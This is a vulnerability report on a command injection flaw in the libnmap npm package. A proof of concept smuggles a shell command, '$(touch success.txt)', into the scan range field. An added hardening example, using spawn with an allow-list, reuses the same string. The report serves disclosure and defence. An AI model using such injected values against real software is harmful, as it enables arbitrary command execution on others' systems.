I would like to report a command injection vulnerability in libnmap.
It allows an attacker to inject arbitrary OS commands instead of a valid network range to be scanned.
module name: libnmap
version: 0.4.11
npm page: https://www.npmjs.com/package/libnmap
API to access nmap from node.js
101 downloads in the last week
If the attacker is allowed to provide the “range” field for the network scan, she can inject arbitrary OS commands instead of a valid IP range.
    const nmap = require('libnmap');
    const opts = {
      range: [
        'scanme.nmap.org',
        "x.x.$(touch success.txt)"
      ]
    };
    nmap.scan(opts, function(err, report) {
      if (err) throw new Error(err);
      for (let item in report) {
        console.log(JSON.stringify(report[item]));
      }
    });
N/A
Use spawn instead of exec.
The attacker can run arbitrary OS commands using this module.
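
The "spawn instead of exec" recommendation, as an added example that is not libnmap's code or part of the original report: the string-concatenation pattern beside an argv-based one with an allow-list on targets. All function names and the -sn flag choice are assumptions for illustration, and the Node binary stands in for nmap so the block runs offline.

```javascript
// Added example; buildShellCommand, isValidTarget, buildArgv and
// echoArgvWithoutShell are hypothetical names, not libnmap APIs.
const { spawnSync } = require('child_process');

// Pattern the report describes: targets are concatenated into one string that
// a shell will parse, so $(...), backticks, ';' and '|' are interpreted.
// The string is only built here, never executed.
function buildShellCommand(range) {
  return 'nmap -sn ' + range.join(' ');
}

// Conservative allow-list: hostnames, IP literals, optional CIDR suffix.
// The first character must be alphanumeric, so a target can never start
// with '-' and be read as an nmap option.
const TARGET_RE = /^[A-Za-z0-9][A-Za-z0-9.:_-]*(\/\d{1,3})?$/;
function isValidTarget(t) {
  return typeof t === 'string' && t.length <= 255 && TARGET_RE.test(t);
}

// Hardened pattern: each validated target is its own argv element.
function buildArgv(range) {
  const bad = range.filter((t) => !isValidTarget(t));
  if (bad.length) throw new Error('invalid target: ' + JSON.stringify(bad));
  return ['-sn', ...range];
}

// Stand-in for nmap: the child is this Node binary, which prints the argv it
// received. With shell:false no shell sits between parent and child, so
// metacharacters arrive as literal bytes.
function echoArgvWithoutShell(args) {
  const script = 'process.stdout.write(JSON.stringify(process.argv.slice(1)))';
  const r = spawnSync(process.execPath, ['-e', script, '--', ...args], { shell: false });
  if (r.status !== 0) throw new Error('child failed: ' + r.stderr);
  return JSON.parse(r.stdout.toString());
}

// Range taken from the proof of concept above.
const POC_RANGE = ['scanme.nmap.org', 'x.x.$(touch success.txt)'];
console.log('shell string  :', buildShellCommand(POC_RANGE));
console.log('argv, no shell:', echoArgvWithoutShell(POC_RANGE));
try {
  buildArgv(POC_RANGE);
} catch (e) {
  console.log('rejected      :', e.message);
}
```

Passing an argument array removes shell parsing; the allow-list is still needed because a target beginning with "-" would otherwise reach nmap as an option.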